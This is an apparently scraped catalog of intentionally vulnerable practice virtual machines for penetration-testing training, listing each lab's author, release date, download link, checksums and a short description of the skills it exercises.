Kioptrix: 2014 (#5)6 Apr 2014KioptrixKioptrix787 MBhttps://download.vulnhub.com/kioptrix/kiop2014.tar.bz2As usual, this vulnerable machine is targeted at the beginner. It’s not meant for the seasoned pentester or security geek that’s been at this sort of stuff for 10 years. Everyone needs a place to start and all I want to do is help in that regard. Also, before powering on the VM I suggest you . For some oddball reason it doesn’t get its IP (well I do kinda know why but don’t want to give any details away). So just add the VM to your virtualization software, remove and then add a network card. Set it to bridge mode and you should be good to go. This was created using ESX 5.0 and tested on Fusion, but shouldn’t be much of a problem on other platforms. Kioptrix VM 2014 download 825Megs MD5 (kiop2014.tar.bz2) = 1f802308f7f9f52a7a0d973fbda22c0a SHA1 (kiop2014.tar.bz2) = 116eb311b91b28731855575a9157043666230432 Waist line 32"Works out of the box with VMware workstation 10, player 6, fusion 6(Can edit the vmx file to force a downgrade for an older version - see ‘kiop2014_fix.zip’).Has been known to work with Virtualbox 4.3 or higher…First thing: try setting it to a x64 machine.Then check: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip.1F802308F7F9F52A7A0D973FBDA22C0A116EB311B91B28731855575A9157043666230432Virtual Machine (VMware)BSDEnabledAutomatically assign
Exploit-Exercises: Mainsequence (v1)29 Jan 2013Exploit-Exercises.comExploit-Exercises593 MBhttps://download.vulnhub.com/exploitexercises/exploit-exercises-mainsequence-fabled-scorpion.isoThe Main Sequence images were used as the Ruxcon 2012 CTF challenge. They covered a variety of situations such as:For more information, see here: http://exploit-exercises.com/mainsequence/setupCE3F9D113571B4E48B218EEB598862DCD8B25DE5CFA599BCBD5C3783759E4113467472FBDisk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: Axis2 Web service and Tomcat Manager15 Jan 2013Pentester LabPentester Lab221 MBhttps://download.vulnhub.com/pentesterlab/axis2_and_tomcat_manager_i386.isoIntermediateThis exercice explains the interactions between Tomcat and Apache, then it will show you how to call and attack an Axis2 Web service. Using information retrieved from this attack, you will be able to gain access to the Tomcat Manager and deploy a WebShell to gain commands execution.2136A9D0118CAB84B2D1B6CDBAEC01A040E6FA8F918CA36FCB65E1D2C0156434524D1C01Disk Image (.ISO)LinuxEnabledAutomatically assign
No Exploiting Me: 12 Sep 2013bwallNo Exploiting Me365 MBhttps://download.vulnhub.com/noexploitingme/NoExploitingMe.vdi.7zVulnerable VM with some focus on NoSQLThis vulnerable VM is meant to act as a practice virtual machine for security researchers to start looking at identifying and exploiting vulnerabilities in NoSQL, PHP and the underlying OS (Debian).6415AA6E4E50FD60C520C705348A881B82DE1AF01F9E67F7BE1897E68040CD580A41C270Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Pentester Lab: From SQL injection to Shell II12 Jun 2013Pentester LabPentester Lab170 MBhttps://download.vulnhub.com/pentesterlab/from_sqli_to_shell_II_i386.isoIntermediateThis exercise explains how you can, from a blind SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system. Blind SQL injection exploitation using time-based exploitation Gaining code execution using a PHP webshell8434D28A36562B2A2F94B4753036DF7F9013F8B035C751D29EE20A704F5E5B65C1856719Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: Electronic CodeBook (ECB)18 Nov 2013Pentester LabPentester Lab169 MBhttps://download.vulnhub.com/pentesterlab/ecb_i386.isoBeginnerThis exercise explains how you can tamper with an encrypted cookies to access another user’s account.A7114704FE356B9538DAB4E2274F7981B9CE6932CEB90B1885FB8CF1CDBA2657BB8BB9A3Disk Image (.ISO)LinuxEnabledAutomatically assign
Pentester Lab: Web For Pentester II15 Jul 2013Pentester LabPentester Lab355 MBhttps://download.vulnhub.com/pentesterlab/web_for_pentester_II_i386.isoBeginnerThis exercise is a set of the most common web vulnerabilities:048A318B9F4F496BC632E4B89F57832FF193A7589A92F178BA0B15880FF12E5819BD800ADisk Image (.ISO)LinuxEnabledAutomatically assign
Web Security Dojo: 226 Jul 2012Maven SecurityWeb Security Dojo1.4 GBhttps://download.vulnhub.com/websecdojo/Web_Security_Dojo-2.0.ovaA free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo[Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v10.04.2, which is patched with the appropriate updates and VM additions for easy use. The Web Security Dojo is for learning and practicing web app security testing techniques. It is ideal for self-teaching and skill assessment, as well as training classes and conferences since it does not need a network connection. The Dojo contains everything needed to get started – tools, targets, and documentation. Download Web Security Dojo from http://sourceforge.net/projects/websecuritydojo/files/ . To install Dojo you first install and run VirtualBox 3.2 or later, then “Import Appliance” using the Dojo’s OVF file. We have PDF or YouTube for instructions for Virtualbox. As of version 1.0 a VMware version is also provided, as well as video install instructions Sponsored by Maven Security Consulting Inc (performing web app security testing & training since 1996). Also, could be you! Web Security Dojo is an open source and fully transparent project, with public build scripts and bug trackers on Sourceforge . Look for Dojo videos on our YouTube channel at http://www.youtube.com/user/MavenSecurity Hack your way to fame and glory 1 with our security challenges posted at Reddit (http://www.reddit.com/r/WebSecChallenges/). 1. Fame and glory not included; void where prohibited by law]67312CD0F991F5AA09FBAAFC3D318BD98A0F5159BCBF9018819836D9B5954AD6486710E5LinuxEnabledAutomatically assign
Bot Challenges: Flipping Bitbot20 Aug 2013bwallBot Challenges359 MBhttps://download.vulnhub.com/botchallenges/Bitbot.VulnVM-disk1.vmdk.7zThis is a Linux based VM that is intended as a way to get security researchers started with simple botnet research. It also requires the researcher have some ability to assess and exploit vulnerabilities, with the ultimate goal of obtaining root access to the VM. This is the second of many to come, please feel free to supply feedback so I can make future ones more enjoyable and fulfilling.The network configuration of the VM is set to auto, so it is easiest to run with some sort of DHCP server on the same network(or just select the NAT option in your virtualization software). It is suggested that you use the NAT option along with port forwarding, but as long as you have TCP access to the VM, you should be fine. There are no supplied credentials, and it is intended that the network services on the VM are the attack vectors. If you have questions, feel free to ask in #vulnhub on freenode(I’m bwall on there). You can also ask me on Twitter(@botnet_hunter). You can also email me at bwall(at)ballastsecurity.netThere is an update to ‘bot.py’ that is found on the VM. You can find the updated version, here: https://gist.github.com/bwall/710624552AC771CE8703D9B35090D8826990118AFF4B8F59ACB2C8C34C7B322C06F1A02Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Bot Challenges: RA1NXing Bots7 Jul 2013bwallBot Challenges547 MBhttps://download.vulnhub.com/botchallenges/RA1NXing_Bots.zipThis is a Linux based VM that is intended as a way to get security researchers started with simple botnet research. It also requires the researcher have some ability to assess and exploit vulnerabilities, with the ultimate goal of obtaining root access to the VM.The network configuration of the VM is set to auto, so it is easiest to run with some sort of DHCP server on the same network(or just select the NAT option in your virtualization software). It is suggested that you use the NAT option along with port forwarding, but as long as you have TCP access to the VM, you should be fine. If you have questions, feel free to ask in #vulnhub on freenode(I’m bwall on there).0806DDAE7C34447ED590A5358F33DC70DDF943AC009B73314FEDD55D43D9CBDA6D7784C3Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
HackLAB: VulnVPN8 Feb 2013Reboot UserHackLAB1.2 KBhttps://download.vulnhub.com/hacklab/client.7zThe idea behind VulnVPN is to exploit the VPN service to gain access to the sever and ‘internal’ services. Once you have an internal client address there are a number of ways of gaining root (some easier than others).I have created/uploaded the relevant files which can be obtained from the compressed file here. You’ll need to configure Openswan/xl2tpd on your system, if you’re using an Ubuntu based Linux variant you can follow the below steps – please note that I’ve used Backtrack 5r3 for all client testing (mentioned as I know it works well): Note: If you change your configuration/IP settings etc you’ll need to reload the relevant configuration files i.e. /etc/init.d/ipsec restart and/or /etc/init.d/xl2tpd restart I realise that VPN’s can be very troublesome (setting this challenge up was bad enough), so I have allowed access to auth and ufw logs. These should help highlight issues you may be experiencing and can be found at (note port 81). Please note that hacking this page and associated scripts are not part of the challenge, rather they have been provided for assistance. A useful config reference can also be found here: https://wiki.archlinux.org/index.php/L2TP/IPsec_VPN_client_setup Architecture: x86 Format: VMware (vmx & vmdk) compatibility with version 4 onwards RAM: 1GB Network: NAT – Static IP (no G/W or DNS configured) Extracted size: 1.57GB Compressed (download size): 368MB – 7zip format – 7zip can be obtained from here Download VulnVPN from -HERE- MD5 Hash of VulnVPN.7z: 9568aa4c94bf0b5809cb0a282fffa5c2 Download Client files from -HERE- MD5 Hash of client.7z: e598887f2e4b18cd415ea747606644f6 As per usual, I shall add a related solutions post shortly. Until then, enjoy Source:E598887F2E4B18CD415EA747606644F6B4396A556E8879E4189B504F6B12F6064A2FA91AVirtual Machine (Virtualbox - VDI)LinuxDisabled192.168.0.10
bWAPP: bee-box (v1.6)2 Nov 2014Malik MesellembWAPP1.2 GBhttps://download.vulnhub.com/bwapp/bee-box_v1.6.7zTraining page: http://www.mmeit.be/en/bwapp_training.htmBlog page: http://itsecgames.blogspot.co.uk/2013/07/bee-box-hack-and-deface-bwapp.htmlThe original release of ‘bee-box (v1.3)’ came out on the 2014-April-19, however, there was an issue extracting it: https://twitter.com/MME_IT/status/457980827281158144.Replacement release came out on the 2014-April-21 (same filename).305AB48FB11BCFD662B0E2F1771DB1DA4D87BC5F105B0372E95BC4623941323AC9EFF525Virtual Machine (VMware)LinuxEnabledAutomatically assign
/dev/random: relativity (v1.0.1)16 Nov 2013Sagi-/dev/random612 MBhttps://download.vulnhub.com/devrandom/relativity_1.0.1.zipv1.0.1 ~ 2013-11-29 Fixed a few bugs when using VirtualBox (thanks to Bas van den Berg - @barrebas)v1.0 ~ 2013-11-16 Public release v0.0 ~ 2013-11-01 Private release - Zacon v0.0 ~ 2013-06-29 Private release - HackFuExclusive to VulnHub!v1.0.1MD5: 0592CAA80495B4A7B3F6CE2DBCEA3776SHA1: 3C3BD6F5FA32EF43AD71CF699FDEE603DBD0913Cv1.0MD5: 3D141EE6A9087A1C2D01078B041B167ASHA1: D1335602963871B1283199EACAA62EAF28ABB17D0592CAA80495B4A7B3F6CE2DBCEA37763C3BD6F5FA32EF43AD71CF699FDEE603DBD0913CVirtual Machine (VMware)LinuxEnabledAutomatically assign
xerxes: 127 Dec 2013Basxerxes443 MBhttps://download.vulnhub.com/xerxes/xerxes.tar.gzExclusive to VulnHub!** (Private) beta release information **Date: 2013-12-20Size: 434MMD5: 00e656b5cca5131c5606c72ab682b7fbSHA1: 7281e779e134a63f2addeebb81f36573f947ba3022B49B2B8FDE59680197BBD009E174A963D9DB7444E9B1114D00D4BE633DFC540DAECE9BVirtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
VulnOS: 122 Mar 2014c4b3rw0lfVulnOS1.3 GBhttps://download.vulnhub.com/vulnos/VulnOS.vdi-vbox.7zWelcome to VulnOS !This is my first vulnerable target I made because I want to give back something to the community. Big up for the community that made things possible!!! Your goal is to get root and find all the vulnerabilities inside the OS ! It is a ubuntu server 10.04 LTS (that’s been made very buggy!!!) DO NOT USE This Box in a production environment!!! It’s a VM thas has been made with Virtualbox 4.3.8 - so it’s in the .vdi format. Networking : This box has been made with bridged networking and uses DHCP to get an IP address (was when I built it). So it is best to share the attack OS and the TARGET BOX to IP-Range OF Maybe you could set it up with m0n0wall and setup static IP-addresses. If you cannot find the target’s IP ADRERSS, contact me @ blakrat1 AT gmail DOT com I will give you the root user and password to login… Hope you find this useful !!!Exclusive to VulnHub!022A4223ADB2ECDC7FE696A1B791BF7A3248559627AF4837A3689444E0537EB272DA6AE9Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Brainpan: 120 Mar 2013superkojimanBrainpan809 MBhttps://download.vulnhub.com/brainpan/Brainpan.zipSource: Brainpan.zip/readme.txtSource: Brainpan.zip/md5.txtExclusive to VulnHub!0F99E72F0703E4619B5E08604778F673E424613FD0137C0688A865623CCBB4D92DFE8209Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Bot Challenges: Dexter25 Mar 2014bwallBot Challenges512 MBhttps://download.vulnhub.com/botchallenges/MurderingDexter.zipIn general, I’ve found that information is much easier to retain if it can be applied in the real world. Not everyone is a self-proclaimed botnet hunter, and it is not suggested (or recommended) that anyone try to exploit live botnets. For these reasons, I have put together another vulnerable virtual machine, which allows for aspiring botnet hunters and security enthusiasts to try their hand at attacking a Dexter command and control panel. It can be downloadedFBB7386A5B7562C88B6DB16DA95B9B4CCB63ECF589BB3BA1C18C015F02E36A84B62A2E7AVirtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
The Infernal: Hades (v1.0.1)9 Jun 2014Lok_SigmaThe Infernal435 MBhttps://download.vulnhub.com/infernal/Hades_v1.0.1.7zInfernal: Hades v1.0.1.Hades is a new boot2root challenge pitched at the advanced hobbyist. Solving this challenge will require skills in reverse engineering, sploit development and sound computer architecture understanding. If you’ve never heard of an opaque predicate, you’re going to have a hard time of it! I strongly suggest you don’t start this the week before exams, important meetings, deadlines of any sort, marriages, etc. The aim of this challenge is for you to incrementally increase your access to the box until you can escalate to root. The /root/flag.txt contains, amongst other things, a public PGP key which you can use to demonstrate victory - the private key has been given to the VulnHub.com admins. Enjoy, Lok_Sigma By using this virtual machine, you agree that in no event will I be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of or in connection with the use of this software. Exclusive to VulnHub!Blog post: http://blog.vulnhub.com/2014/04/competition-hades.htmlv1 = 08/04/2014v1.0.1 = 09/06/2014B30D98E093E6ACCDECCF0553BF085C893D6D901813B8A5871EEFF3EB83F39ADD241DAF34Virtual Machine (VMware)LinuxEnabledAutomatically assign
Brainpan: 220 Nov 2013superkojimanBrainpan403 MBhttps://download.vulnhub.com/brainpan/brainpan2.zipBy using this virtual machine, you agree that in no event will I be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of or in connection with the use of this software.TL;DR: If something bad happens, it’s not my fault. Brainpan has been tested and found to work on the following hypervisors: - VMware Player 6.0.1 - VMWare Fusion 6.0.2 - VirtualBox 4.3.2 Check to make sure brainpan2.ova has following checksums so you know your download is intact: MD5: bf01f03ea0e7cea2553f74189ff35161 SHA1: b46891cda684246832f4dbc80ec6e40a997af65a Import brainpan2.ova into your preferred hypervisor and configure the network settings to your needs. It will get an IP address via DHCP, but it’s recommended you run it within a NAT or visible to the host OS only since it is vulnerable to attacks.Exclusive to VulnHub!Blog post: http://blog.vulnhub.com/2013/11/competition-brainpan-2.html55954FCA220801EA90CFB134DDE81E279CCD84837E7041594B21AA4DC7D981F5EF3AD248Virtual Machine (VMware)LinuxEnabledAutomatically assign
Exploit KB Vulnerable Web App: 128 Jan 2013ShaiExploit KB Vulnerable Web App212 MBhttps://download.vulnhub.com/exploitkb/exploit-wa-vm.7zDuring my SQL Injection learning journey I needed a vulnerable web application for practice.[I created a WebApp vulnerable to SQL Injection for my personal use, The result was an extremely vulnerable web site which I could test some SQLi techniques against MySQL. I must confess, I am not a programmer and I have never coded in PHP before, I thought it would be a good practice to develop a PHP based site from scratch in order to learn the basic of PHP and MySQL. exploit.co.il Vulnerable Web app designed as a learning platform to test various SQL injection Techniques and it is a fully functional web site with a content management system based on fckeditor. I thought some of you may find it useful so i decided to share it via a SourceForge project page i created for it at : https://sourceforge.net/projects/exploitcoilvuln Please notice! this web app is extremely vulnerable to SQLi attack and its poorly coded and configured intentionally. It is not recommended to use this WebApp as live site on the net neither set it up on your local machine with access to it from the web. Please use it in your internal LAN only, Set it up in a virtual environment such as VMware or Virtual Box. This is a fully functional web site with a content management system based on fckeditor. I hope you will find this web app useful in your SQLi and web app security studies or demonstrations. Visit the Vulnerable Web Site by browsing to its IP address Admin interface can be found at: http://localhost/admin Username: admin Password: Database Name: exploit Database contains 8 tables: articles authors category downloads links members news videos I have only tested the web app for SQLi, but i am sure you will find some more interesting vulnerabilities Please try to avoid using automated tools to find the vulnerabilities and try doing it manually Feel free to discuss this web app by visiting http://exploit.co.il and commenting on the relevant post. You can send solutions, videos and ideas to shaiat]exploit.co.il and i will post them on my blog. Good Luck! Source:22FE5240E8C0347F7DF02828FC8636B587724AE4E514A2A6286C02502B54E58F04E30659Virtual Machine (VMware)LinuxEnabledAutomatically assign
VulnImage: 122 Dec 2010Lars BaumgaertnerVulnImage350 MBhttps://download.vulnhub.com/vulnimage/vulnimage.zip“Created for Lars’s students”Source:8CB0E628AEB3C7E1F771764D072806553739B679A7D469F455A7412F61ACAF22EF175D99Virtual Machine (VMware)LinuxEnabledAutomatically assign
Vicnum: 1.430 Dec 2009Mordecai KrausharVicnum448 MBhttps://download.vulnhub.com/vicnum/VMvicnum14.zipA flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. Helpful to IT auditors honing web security skills and setting up ‘capture the flag’.Source:114D09578674DA13C1CA396AE534BD33BC36B166CC3D2E53C0F93A6CE075207153301999Virtual Machine (VMware)LinuxEnabledAutomatically assign
HackLAB: VulnVoIP31 Oct 2012Reboot UserHackLAB553 MBhttps://download.vulnhub.com/hacklab/vulnVoIP.7zVulnVoIP is based on a relatively old AsteriskNOW distribution and has a number of weaknesses. The aim is to locate VoIP users, crack their passwords and gain access to the Support account voicemail.Just to keep things interesting this particular disto also suffers from a known exploit from which it is relatively easy to gain a root shell. Once you’ve found the easy way, can you get root using a different method? I’ve created these basic VoIP hacking training exercises as I found very limited resources online. Hopefully VulnVoIP will help others learn the basic fundamentals of VoIP hacking in a safe environment. Source:1411BC06403307D5CA2ECAE47181972ADBF4A51899EF94A744B4FB47FDA902430BC5F5E5Virtual Machine (VMware)LinuxEnabledAutomatically assign
HackLAB: Vulnix10 Sep 2012Reboot UserHackLAB195 MBhttps://download.vulnhub.com/hacklab/Vulnix.7zHere we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well at the time of release anyway!)The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012. The details are as follows: The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish – excluding the actual hacking of the vmdk Free free to contact me with any questions/comments using the comments section below. Enjoy! Source:0BF19D11836F72D22F30BF52CD5857573A4C3E9599FFBACE23387B368184E23E1F10F65CVirtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
/dev/random: scream10 Nov 2012Sagi-/dev/random156 MBhttps://download.vulnhub.com/devrandom/scream.exeSource: readme.nfoVulnInjector requires .NET framework version 4 or higher to be installed.Exclusive to VulnHub!Please see https://github.com/g0tmi1k/VulnInjector (Will need to generator your own ISO from the EXE).55170BC0410741BFCC374ABD7B8D3DC18FFAF13758C6449024AA86DA1E2B7E7F1986865BDisk Image (.ISO)WindowsEnabledAutomatically assign
OWASP Broken Web Applications Project: 1.23 Aug 2015OWASPOWASP Broken Web Applications Project1.7 GBhttps://download.vulnhub.com/owaspbwa/OWASP_Broken_Web_Apps_VM_1.2.7zThe Broken Web Applications (BWA) Project produces a Virtual Machine running a variety of applications with known vulnerabilities for those interested in:all the while saving people interested in doing either learning or testing the pain of having to compile, configure, and catalog all of the things normally involved in doing this process from scratch. Source: Release notes for the Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost and commercial VMware products. More information about the project can be found at http://www.owaspbwa.org/. The VM can be downloaded as a .zip file or as a much smaller .7z 7-zip Archive. BOTH FILES CONTAIN THE EXACT SAME VM! We recommend that you download the .7z archive if possible to save bandwidth (and time). 7-zip is available for Windows, Mac, Linux, and other Operating Systems. !!! This VM has many serious security issues. We strongly recommend that you run it only on the “host only” or “NAT” network in the virtual machine settings !!! Version 1.2 - 2015-08-03 Version 1.2rc1 - 2015-06-24 Version 1.1.1 - 2013-09-27 Version 1.1 - 2013-07-30 Version 1.1beta1 - 2013-07-10 Version 1.0 - 2012-07-24 Version 1.0rc2 - 2012-07-14 Version 1.0rc1 - 2012-04-04 Version 0.94 - 2011-07-24 Version 0.94rc3 - 2011-07-14 Version 0.94rc2 - 2011-07-13 Version 0.94rc1 - 2011-07-11 Version 0.93rc1 - 2011-01-19 Version 0.92rc2 - 2010-11-15 Version 0.92rc1 - 2010-11-10 Version 0.91rc1 - 2010-03-24 Version 0.9 - 2009-11-115FF063FE3D01887DAB49A5903C27C8FE6EBA081CBB54FE5804C8B2BD4B17AC9A053E4153Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Damn Vulnerable Web Application (DVWA): 1.0.72 Oct 2011RandomStormDamn Vulnerable Web Application (DVWA)480 MBhttps://download.vulnhub.com/dvwa/DVWA-1.0.7.isoDamn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment. Source:9484D8E2154D4E01FBD742CD7C10AFFDE190DE8F6BC61D6596F21A8A6A9DA9E19DA3C0BFDisk Image (.ISO)LinuxEnabledAutomatically assign
Badstore: 1.2.324 Feb 2004BadstoreBadstore4.6 MBhttps://download.vulnhub.com/badstore/BadStore_123s.isoWelcome to Badstore.net Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure. Our Badstore demonstration software is designed to show you common hacking techniques. Source: v1.0 – Original version for 2004 RSA Show v1.1 – Added: v1.2 – Version presented at CSI 2004 Added: Source: BadStore_Manual.pdfB0F3BA0C4BF1EC0D82170B0552E25B7E6861B9DF1919D69EA198B1BEB509005D830890A8Disk Image (.ISO)LinuxEnabledAutomatically assign
Bobby: 17 Dec 2011TheXeroBobby5 MBhttps://download.vulnhub.com/bobby/bobby.exeSource: readme.txtExclusive to VulnHub!You will need to use your own Windows XP .ISO to create the target in order to attack. You can use any version of Windows to generate the image, but you need to supply it a valid Windows XP CD during the creation stage.Please see https://blog.vulnhub.com/introducing-vulninjector/ for more information.VulnInjector requires .NET framework version 4 or higher to be installed.C3F02A6ADAED5AC4DF906F3269700F5448E50E9173E26A6D2AD9A76FFD5D1FA344D23E68Disk Image (.ISO)WindowsDisabled192.168.1.11
Vicnum: 1.318 Oct 2009Mordecai KrausharVicnum303 MBhttps://download.vulnhub.com/vicnum/VMvicnum13.zipA flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. Helpful to IT auditors honing web security skills and setting up ‘capture the flag’.Source: Note: ‘Bad virtual machine file’. You’ll need to create a new virtual machine & attach the existing hard driveDB4E6598ECC978BCF5DE0DE48A1B1FA00C03C9BCEEA57D86205881DC30781380485E9F19Virtual Machine (VMware)LinuxEnabledAutomatically assign
GoatseLinux: 127 Jun 2009neutronstarGoatseLinux555 MBhttps://download.vulnhub.com/goatselinux/GoatseLinux_1.0_VM.rarGoatseLinux v1.0 pentest lab Virtual MachineSteve Pordon 2009.06.27 Feel free to distribute this far and wide under the gnu license. This is specifically built for VMware 6.5 compatibility. WARNING: GoatseLinux is intentionally unsecure. It was designed as a laboratory box to practice penetration testing on. Due to the wide open nature of nearly every program installed on it, I would strongly advise against setting your VM network to anything other than “host-based,” unless you enjoy your VMs being used as zombie spamboxes. Notes: Built on the Slax 5.0.7 distro. Source: readme.txt00E4240F1440105DD14FF2F5F03AAE82E07D183622DC8BF8694B545C92D7F00550DED88AVirtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Rattus: Loophole10 Apr 2011RattusRattus436 MBhttps://download.vulnhub.com/rattus/Loophole.isoHi everyone!Recently I’ve created my own Live CD and would like to get some feedback from you. This Live CD, codename Loophole, is meant to show you how important it is to keep your software up to date and properly configured. There’s more than one way into the system and each one of them will teach you different network/computer security related topics. We suspect that someone inside Rattus labs is working with known terrorist group. Your mission is to infiltrate into their computer network and obtain encrypted document from one of their servers. Our inside source has told us that the document is saved under the name of Private.doc.enc and is encrypted using OpenSSL encryption utility. Obtain the document and decrypt it to complete the mission. Source:F883D42170442E50E5310D16BE5A62B984D356F7DEBA7280F674F81D2DD3B02EA3A52A0DDisk Image (.ISO)LinuxDisabled10.8.7.2
Lab In A Box: 13 Jun 2012PenTest LaboratoryLab In A Box2.4 GBhttps://download.vulnhub.com/labinabox/laboratory_BT5r2-PTEv1.7zThe BackTrack Linux 5r2-PenTesting Edition lab is an all-in-one penetration testing lab environment that includes all of the hosts, network infrastructure, tools, and targets necessary to practice penetration testing. It includes:This lab has some of the most popular penetration testing tools pre-installed and a number of vulnerabilities to discover and exploit. This all-in-one solution is the easiest and fastest method of building a full penetration testing lab environment for practicing your skills! Source:3D6CA80B7E6AB74CF5EB31B92852FB2D218A5A6E579330128D16A64D10A74B976E37F21CVirtual Machine (VMware)LinuxEnabledAutomatically assign
UltimateLAMP: 0.215 May 2006ARABX Pty LtdUltimateLAMP860 MBhttps://download.vulnhub.com/ultimatelamp/UltimateLAMP-0.2.zipUltimateLAMP includes a long list of popular LAMP stack applications. For more information take a look a the UltimateLAMP products list.With the success of this first product, research has already commenced in our next two products UltimateLAMJ (Open Source Java Based Applications) and UltimateLAMR (Open Source Ruby Applications). Source:3C4BA8CF727B8021925F20AE42F4D7AECD0AA1783E3A63D9BEAFC67E68BB63A1DF6E4F9AVirtual Machine (VMware)LinuxEnabledAutomatically assign
pWnOS: 1.027 Jun 2008pWnOSpWnOS432 MBhttps://download.vulnhub.com/pwnos/pWnOS_v1.0.zipSome of you may have noticed this new pWnOS forum section. I created pWnOS as a virtual machine and Grendel was nice enough to let me post about it here. Here’s a bit of information on pWnOS.It’s a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. 😃 Currently, the virtual machine NIC is configured in bridged networking, so it will obtain a normal IP address on the network you are connected to. You can easily change this to NAT or Host Only if you desire. A quick ping sweep will show the IP address of the virtual machine. Sorry…no scenario/storyline with this one. I wasn’t really planning to release it like this, so maybe for version 2.0 I’ll be more creative. 😃 I’m anxious to get feedback so let me know how it goes or if you have questions. Thanks and good luck! Source: Thanks for trying pWnOS 1.0. A few things to note before getting started. pWnOS is made using VMware Workstation and can be started by downloading VMware Server or Vmware player…both of which are free! Or VMware Workstation (Windows) or VMware Fusion (OS X), which are not free. I would rate the difficulty of pWnOS approximately the same as De-Ice’s level 2 disk…maybe a bit more difficult. See http://www.de-ice.net for information on the De-Ice penetration testing disks. I hope you enjoy it! If you have any questions or feedback, email me at bond00(at)gmail.com bond00 Source: pWnOS_v1.0.zip/pWnOS readme.txt2C9DE33D0AA852F3B2E2E7D90C5F5C0E7924910A3E5C9A69053484D998BD6729AFF3757BVirtual Machine (VMware)LinuxEnabledAutomatically assign
Kioptrix: Level 1.3 (#4)8 Feb 2012KioptrixKioptrix210 MBhttps://download.vulnhub.com/kioptrix/Kioptrix4_Hyper_v.rarAgain a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:[ Edit: sorry not what I meant ] 1a. It’s possible to remotely compromise the machine I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post. Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start. I’d would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. – A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the imagine to suit your fusion version. – Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve test the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions. Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys So I hope you enjoy this one. The Kioptrix Team Source: Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive1CBF24D1CA5BCB6651FE64EEE651928F0A309696CD2F591DBEA36F295B538EA6322775CFVirtual Machine (VMware)LinuxEnabledAutomatically assign
pWnOS: 2.0 (Pre-Release)4 Jul 2011pWnOSpWnOS286 MBhttps://download.vulnhub.com/pwnos/pWnOS_v2.0.7zpWnOS v2.0 (PRE-RELEASE!)pWnOS v2.0 is a Virutal Machine Image which hosts a server to pratice penetration testing. It will test your ability to exploit the server and contains multiple entry points to reach the goal (root). It was design to be used with WMWare Workstation 7.0, but can also be used with most other virtual machine software. For example the ip of with the netmask of is what I statically set my BackTrack 5 network adapter to. You may need to change VMWare’s Network Adapter to NAT or Host-Only depending on your setup The server’s ip is staticaly set to v2.0 - 07/04/2011 - Pre-Release copy for initial testing Source: pWnOS_v2.0.7z/pWnOS v2.0/pWnOS_INFO-v2_0.txt1EB0960C0BA29335230ADA1DF80CD22CA3FDBE0449363D1CB844D865FE7BD6EE8968567DVirtual Machine (VMware)LinuxDisabled10.10.10.100
